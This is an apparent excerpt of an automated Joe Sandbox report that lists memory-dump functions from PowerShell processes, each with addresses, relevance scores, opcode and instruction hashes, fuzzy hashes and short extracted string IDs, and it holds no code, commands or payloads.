                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1852160941.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cdb8b4c7a0ebce3915aac53c31bc6a9b3e1dbe17d7b92ff49647a25fd44352a6
                                                                            • Instruction ID: 52f00055ce311874898ed5966158b0cfc74853b59192bcce4163bee59d5d028b
                                                                            • Opcode Fuzzy Hash: cdb8b4c7a0ebce3915aac53c31bc6a9b3e1dbe17d7b92ff49647a25fd44352a6
                                                                            • Instruction Fuzzy Hash: 3EE15832B1EA8D1FE7A5DB6848A56B877E1EF55310F1901BED05CC71E3DE28AC458381
                                                                            Function 00007FFD9B9799C4 Relevance: .4, Instructions: 427COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1852160941.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 72c61350cbb43099f631d179f94e0cfc102d9afbe4e106334eea6347c12a21e8
                                                                            • Instruction ID: aebb59b33c4e0d043a02f200501d218f04f899d412d8fa091c5841eea638ab57
                                                                            • Opcode Fuzzy Hash: 72c61350cbb43099f631d179f94e0cfc102d9afbe4e106334eea6347c12a21e8
                                                                            • Instruction Fuzzy Hash: A8C14A22B1FB892FEBA6D76C58A95B47BE1EF56210B0900FBD05CCB1E3D918AD05C341
                                                                            Function 00007FFD9B978E27 Relevance: .3, Instructions: 261COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1852160941.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8d1702a1cd4ccab07b7927be856fc74a456e2eafe8bcf9d36613e57e09326837
                                                                            • Instruction ID: ef8229c25b6dc2f6f067c1a2a6ba5b7bef7f2197e51255a7c3a557fe96af0860
                                                                            • Opcode Fuzzy Hash: 8d1702a1cd4ccab07b7927be856fc74a456e2eafe8bcf9d36613e57e09326837
                                                                            • Instruction Fuzzy Hash: E0613832B2EA0D1FEBA8D65D58E55B977D2EF85210F1501BBD45DC31A2EE14EC0683C1
                                                                            Function 00007FFD9B97A41A Relevance: .2, Instructions: 186COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1852160941.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a400bab314fa1ba0cdb98f082d6f7dec9a4b2a7a6fe8b3000005c3216bd5f335
                                                                            • Instruction ID: bdfd1af59539603d0b77214de405c67a40e18e2c20bcee2300c4288e2d638c94
                                                                            • Opcode Fuzzy Hash: a400bab314fa1ba0cdb98f082d6f7dec9a4b2a7a6fe8b3000005c3216bd5f335
                                                                            • Instruction Fuzzy Hash: D5512922B0EBCD0FEB66DB6858A45B57BE0EF56210B0900FBD05DCB0E3D9156D45C742
                                                                            Function 00007FFD9B979C1A Relevance: .1, Instructions: 116COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1852160941.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4f516bd8980f69a447a799b61821082dec464c91ad69335d04b436a7ae4d16cc
                                                                            • Instruction ID: d0cf7cd7658b7f463bfe8eacdcd10f2e79ceb4ddb3a84e5d7170c5c04903bcc1
                                                                            • Opcode Fuzzy Hash: 4f516bd8980f69a447a799b61821082dec464c91ad69335d04b436a7ae4d16cc
                                                                            • Instruction Fuzzy Hash: A341C521A1FBC92FEB629B6848A95647FE0EF56210B0E00FBD45CCB1E3D9186905C751
                                                                            Function 00007FFD9B9754B2 Relevance: .1, Instructions: 108COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1852160941.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b6c2229a6cd5e306df65b5b733378159a88c1aecc8d00ec201c27e549d8dbec9
                                                                            • Instruction ID: 38a100a4ce6062968e5e467261f9e5dfa2678646e46b1c64c96606e85fde1cb1
                                                                            • Opcode Fuzzy Hash: b6c2229a6cd5e306df65b5b733378159a88c1aecc8d00ec201c27e549d8dbec9
                                                                            • Instruction Fuzzy Hash: 5F31D622F2FADA1BE7F597A828B11BC67C2EF55254B5901BAD45DCB1E7ED0C5C004341
                                                                            Function 00007FFD9B8AAFE4 Relevance: .1, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1851787476.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7150e9a28b7549fd6c8e54dfccdb8e2e7587b7357cdecdbec983e9e91ce37799
                                                                            • Instruction ID: d2ff1935eb637c1382c9d9f919ec6e0e0541fad52a207be6b72e8d5d402993f1
                                                                            • Opcode Fuzzy Hash: 7150e9a28b7549fd6c8e54dfccdb8e2e7587b7357cdecdbec983e9e91ce37799
                                                                            • Instruction Fuzzy Hash: 39315430A1964ECEFBB4AF64CC6AFF932D4FF45318F410139D45D860A2DA396A45CB61
                                                                            Function 00007FFD9B97121F Relevance: .1, Instructions: 77COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1852160941.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 411f9b33fe830357ceab7d4547942111e4536907e56cebbf5dea716afa95d450
                                                                            • Instruction ID: c43f116ca4adb7224fffb3f8acc7c3c2a5779e3f1c933cf111dbab9542b72e52
                                                                            • Opcode Fuzzy Hash: 411f9b33fe830357ceab7d4547942111e4536907e56cebbf5dea716afa95d450
                                                                            • Instruction Fuzzy Hash: 5121FF52F1FBD91FE7A1A67818B50A86BD1EF66648B0A40FFD099CB1E3DC185C098312
                                                                            Function 00007FFD9B8A3945 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1851787476.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                            • Instruction ID: 04b822a5e3d45822b76be075df3c081dc68bfd048355e8304278f52f19c5101e
                                                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                            • Instruction Fuzzy Hash: F401677121CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5D636E881CB45

                                                                            Executed Functions

                                                                            Function 00BFE928 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: \VHm
                                                                            • API String ID: 0-3272467948
                                                                            • Opcode ID: e4e393925487272b97c78f7d997a1df318ccca1670fc111282e5689a52c9ef6f
                                                                            • Instruction ID: faaee6da357bf5e868a7912a4f6c311f19a4a00dc590f1eea71cc32ce33259a2
                                                                            • Opcode Fuzzy Hash: e4e393925487272b97c78f7d997a1df318ccca1670fc111282e5689a52c9ef6f
                                                                            • Instruction Fuzzy Hash: 7CB12A70E0020D8FDB14CFA9C8857BDBBF2EF88314F148169E925A7264EB74D849CB91
                                                                            Function 00BFF1F8 Relevance: .3, Instructions: 266COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 133cfc6386f7f7e7416278958455460f33e7855388321d183d65cc732a76b0e9
                                                                            • Instruction ID: 8792c93f3adbae533baf0ff1e96fe95735f7856e89cde48a86c830fc9cf9c37f
                                                                            • Opcode Fuzzy Hash: 133cfc6386f7f7e7416278958455460f33e7855388321d183d65cc732a76b0e9
                                                                            • Instruction Fuzzy Hash: C3B12A71E0020E8FDB10CFA9D8957BDBBF2EF88314F148179E915A7294EB749849CB85
                                                                            Function 00BFAE30 Relevance: 10.5, Strings: 8, Instructions: 521COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8NHm$Hbq$h]Hm$h]Hm$h]Hm$$^q$$^q$IHm
                                                                            • API String ID: 0-2014077908
                                                                            • Opcode ID: 98c9211eddd5179191b878f958bf627610122f125f366201fd47babc3d101336
                                                                            • Instruction ID: a2505503df61b7f4b0a4cf1808555fd93a2748c0aec6ace87528f303c7891b1c
                                                                            • Opcode Fuzzy Hash: 98c9211eddd5179191b878f958bf627610122f125f366201fd47babc3d101336
                                                                            • Instruction Fuzzy Hash: EB225F34B00118CFCB29DB24C894AAEB7F6AF89345F1485E9D50AAB391CB35DD85CF81
                                                                            Function 06DB7758 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                            • API String ID: 0-2822668367
                                                                            • Opcode ID: a7c53c7c43841c2a65c5cc4e2905774331b47d23c98854bcf65cdefc986493c5
                                                                            • Instruction ID: 4661130b5b017317482262673c269189ed1b1444b6973120cfc8926ca6be3526
                                                                            • Opcode Fuzzy Hash: a7c53c7c43841c2a65c5cc4e2905774331b47d23c98854bcf65cdefc986493c5
                                                                            • Instruction Fuzzy Hash: 4AD17D74E00208DFD754DB68C551B9EBBF2AB84304F20C469E9166F399CF71E886CBA5
                                                                            Function 06DB7738 Relevance: 4.0, Strings: 3, Instructions: 271COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$4'^q
                                                                            • API String ID: 0-1196845430
                                                                            • Opcode ID: fa053c2b4598cf76227842f10073eada6bb8bc3f6c5bf122550bb825dc648af8
                                                                            • Instruction ID: e30758c14a2bb70af6ba5e3531dbe9a8bc4a7f1ce4a681a4165c0309d08d25a6
                                                                            • Opcode Fuzzy Hash: fa053c2b4598cf76227842f10073eada6bb8bc3f6c5bf122550bb825dc648af8
                                                                            • Instruction Fuzzy Hash: 2DB1BE74E00208DFDB54CB68C541B9EBBF2AF88304F15C559E8066F399CB75E886CBA5
                                                                            Function 06DB04E0 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q$$^q
                                                                            • API String ID: 0-831282457
                                                                            • Opcode ID: b7ed48f819ba40621ae3a708888acbcd018f829fa6ec75f04fa7b49f704d14f2
                                                                            • Instruction ID: 73527adc3d08a530ebcf1d1b3a41c5b27fea9e6fff3dac8681840fdfc2ed8a36
                                                                            • Opcode Fuzzy Hash: b7ed48f819ba40621ae3a708888acbcd018f829fa6ec75f04fa7b49f704d14f2
                                                                            • Instruction Fuzzy Hash: A3412672F00219DFCB649F6988406FFB7E5AF88610B14882AD81ADB709DF32D945C7E5
                                                                            Function 06DB694B Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q
                                                                            • API String ID: 0-2697143702
                                                                            • Opcode ID: 7fc4a1ae3b7ded78f76c2225aa6d53d3b5348e2f9ab332730327d839b4b1331c
                                                                            • Instruction ID: ff08d6beb000589dc776a4a0d9af9617a6811fc1b4cbd750f077811cad047295
                                                                            • Opcode Fuzzy Hash: 7fc4a1ae3b7ded78f76c2225aa6d53d3b5348e2f9ab332730327d839b4b1331c
                                                                            • Instruction Fuzzy Hash: FEF17370A40218DFDB64DB58CD51F9EBBF2EB84300F1484A5E90A6F395CB71DD868BA1
                                                                            Function 00BFEF70 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: \VHm$\VHm
                                                                            • API String ID: 0-4104177699
                                                                            • Opcode ID: fe7470f5725398525d7467b5ab657dc548cb160e7f75ac58f0113049d44b0a18
                                                                            • Instruction ID: 2ec62cc15437d5c3f68c2da4b5112aa1016bff62f64dc6af8b2970aea32cec53
                                                                            • Opcode Fuzzy Hash: fe7470f5725398525d7467b5ab657dc548cb160e7f75ac58f0113049d44b0a18
                                                                            • Instruction Fuzzy Hash: D3714971E0020ECFDF10DFA9C8817AEBBF2EF88314F148169E515A7254EB749849CB91
                                                                            Function 00BFEF64 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: \VHm$\VHm
                                                                            • API String ID: 0-4104177699
                                                                            • Opcode ID: 4c423ce268c6fbb1792f2257c773029c8193d142efa04de1bb2052d54f7615fd
                                                                            • Instruction ID: fa14fbd40d89a4a091fa923fc61a7cc27aed108848f96ae32f81c33b122c30a7
                                                                            • Opcode Fuzzy Hash: 4c423ce268c6fbb1792f2257c773029c8193d142efa04de1bb2052d54f7615fd
                                                                            • Instruction Fuzzy Hash: E17159B0E0024EDFDB10DFA8C8857EEBBF1EF88314F148169E519A7254EB749849CB91
                                                                            Function 06DB0668 Relevance: 2.6, Strings: 2, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: tP^q$tP^q
                                                                            • API String ID: 0-309238000
                                                                            • Opcode ID: 21c67570f7d61a1426898928183c31865809461479218491efe7d42444ad98a6
                                                                            • Instruction ID: 4cd700220c557fbc25b3d15d7c5c735ce5029448272b908d0333562237855139
                                                                            • Opcode Fuzzy Hash: 21c67570f7d61a1426898928183c31865809461479218491efe7d42444ad98a6
                                                                            • Instruction Fuzzy Hash: EB412A35F04344DFC7558B6898146ABFFF1AFC2210B18C0ABD546CF296DA72D845C792
                                                                            Function 06DB301B Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84l$tP^q
                                                                            • API String ID: 0-3541837005
                                                                            • Opcode ID: 3aa38e5c172dbb08c45ab82ef89aed5c5ac295b7e117d3ddf9b8669dbd6f562b
                                                                            • Instruction ID: f9058b81f9456ff51e7017af92516312bfd5a0d43d7af827421f6e113484f4f7
                                                                            • Opcode Fuzzy Hash: 3aa38e5c172dbb08c45ab82ef89aed5c5ac295b7e117d3ddf9b8669dbd6f562b
                                                                            • Instruction Fuzzy Hash: 7E314930E05244EFC7608F55C854AA6FFF6AF85710F1AC48AE44A9F25AC732DC45C7A1
                                                                            Function 00BFBAE8 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: h]Hm$IHm
                                                                            • API String ID: 0-911805665
                                                                            • Opcode ID: ab8b70d3acde6c11bc681d8e110305022919e5bd637c42818cf35ecdc833fcd2
                                                                            • Instruction ID: c9107968114daa6924269dc69b9f165891340341d8bb19c7d05c31f68e6c9064
                                                                            • Opcode Fuzzy Hash: ab8b70d3acde6c11bc681d8e110305022919e5bd637c42818cf35ecdc833fcd2
                                                                            • Instruction Fuzzy Hash: F6314A30B051288FDB25DB64C894AEEB7F2AF89345F1144E9D60AAB351CB35DE85CF81
                                                                            Function 06DB04D7 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q
                                                                            • API String ID: 0-355816377
                                                                            • Opcode ID: be1b3bb60878209f21a7f8acf56e18117ae6a6e1b4282113ba73cc65e8593f47
                                                                            • Instruction ID: bbcbeb502af12f06d287b532e840641ba2bc1c04cfe856f1a15efe940c2cd138
                                                                            • Opcode Fuzzy Hash: be1b3bb60878209f21a7f8acf56e18117ae6a6e1b4282113ba73cc65e8593f47
                                                                            • Instruction Fuzzy Hash: A411D276D00219EF8FA48F6989402FBB7F4FF48610B15856ADC1AEB609D630D904C7E8
                                                                            Function 00BFE91D Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2955802932.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_bf0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: \VHm
                                                                            • API String ID: 0-3272467948
                                                                            • Opcode ID: 4c8127b91be548954118bc88f8b1ac96d0297e53d8ce9d5c5d67168918468131
                                                                            • Instruction ID: 9d118b88aa30791092af2d1e7dce5fbf78c06735189fe1d7cea5232c7967974a
                                                                            • Opcode Fuzzy Hash: 4c8127b91be548954118bc88f8b1ac96d0297e53d8ce9d5c5d67168918468131
                                                                            • Instruction Fuzzy Hash: 34B11870E0020D8FDB10DFA9C9857BDBBF1EF48314F148169E929A7264EB74D849CB91
                                                                            Function 06DB0648 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: tP^q
                                                                            • API String ID: 0-2862610199
                                                                            • Opcode ID: 79193d9d2ae1f94f256227e600db9bedfd2337525f40a09be71d4517caa9e846
                                                                            • Instruction ID: 314bd94f0739f0f1c9ba9b36a1c96cf3ffc5d89c8417ee23677adc48df81986c
                                                                            • Opcode Fuzzy Hash: 79193d9d2ae1f94f256227e600db9bedfd2337525f40a09be71d4517caa9e846
                                                                            • Instruction Fuzzy Hash: 3D213731E05384DFD7618B548855BA7FFF1AF82220F098096D44A8F296D631D944CBA1
                                                                            Function 06DB4BD8 Relevance: .7, Instructions: 715COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7628c27d533c8f4d7e0c0181ce316e869ec1848467f8b2060f3520d63bf86327
                                                                            • Instruction ID: 46508b13067da3e15b0b5efeed8d8525fc5e9ac0be80786545c9b9d37f695458
                                                                            • Opcode Fuzzy Hash: 7628c27d533c8f4d7e0c0181ce316e869ec1848467f8b2060f3520d63bf86327
                                                                            • Instruction Fuzzy Hash: BC523C74A00204CFDB54CF98C595BAEBBF2AF85304F24C469D9169B35ACB72EC42CB91
                                                                            Function 06DB4BBC Relevance: .6, Instructions: 639COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4f5db06a45a2b27b616789da5a17c01e9f4bb6450a2e8220b0b0cd08dba132d0
                                                                            • Instruction ID: 6bf5552e57680177fc35b6947a37d494c2c50299482afe8300ab9a9d9c33a5a7
                                                                            • Opcode Fuzzy Hash: 4f5db06a45a2b27b616789da5a17c01e9f4bb6450a2e8220b0b0cd08dba132d0
                                                                            • Instruction Fuzzy Hash: A1422B74A00204DFDB94CF98C595EAEBBF2AF84304F14C469D9169B35ACB72EC42CB91
                                                                            Function 06DB4E13 Relevance: .5, Instructions: 493COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cc0c50ad544e7268a05035a19d00080843b683d0a01f04521295a0b9022532d2
                                                                            • Instruction ID: 080751910635b9b31d7a8ac249a88b6fca82b6b749da87a244f6076153c5b2ea
                                                                            • Opcode Fuzzy Hash: cc0c50ad544e7268a05035a19d00080843b683d0a01f04521295a0b9022532d2
                                                                            • Instruction Fuzzy Hash: FA220D74A00204DFDB94CF98C595EAEBBF2AF84304F15C469D9169B35AC772EC42CB91
                                                                            Function 06DB534B Relevance: .4, Instructions: 439COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3bd318e0fced4361a4a755eb337cb3a70acfd9afb6c07d53f0dc42c49d554a49
                                                                            • Instruction ID: 46bcc43627fd9d0ed490abca56107bb9bd1a91f0f3dd3dc0198cf069667aaa5a
                                                                            • Opcode Fuzzy Hash: 3bd318e0fced4361a4a755eb337cb3a70acfd9afb6c07d53f0dc42c49d554a49
                                                                            • Instruction Fuzzy Hash: C7021B74A00204DFDB94CF99C595FAEBBB2AF84304F14C469E9165B35ACB72EC42CB91
                                                                            Function 06DB1020 Relevance: .4, Instructions: 426COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d26d1d63dd1e122a02ee3becf66c22a0118a310f1a35294ae0ff8e53ed2789ca
                                                                            • Instruction ID: c6753f78bb6e3f8e320a5af65a2a2a51ec028e1ca00584b2cf91ac7b85c5648e
                                                                            • Opcode Fuzzy Hash: d26d1d63dd1e122a02ee3becf66c22a0118a310f1a35294ae0ff8e53ed2789ca
                                                                            • Instruction Fuzzy Hash: 33024E74B00204DFD754CB99C951FAABBF2AF89354F14C059E9069B35ACB32DC46CB91
                                                                            Function 06DB512C Relevance: .4, Instructions: 419COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cf6db227d2d8f72b199eff632fbd4a8cc45af85f8bc72a75556238c9b21e99b1
                                                                            • Instruction ID: bd84f285d31d09eccc1a2a9e06c94464d1e093e010404f87fd6487b28b9414a8
                                                                            • Opcode Fuzzy Hash: cf6db227d2d8f72b199eff632fbd4a8cc45af85f8bc72a75556238c9b21e99b1
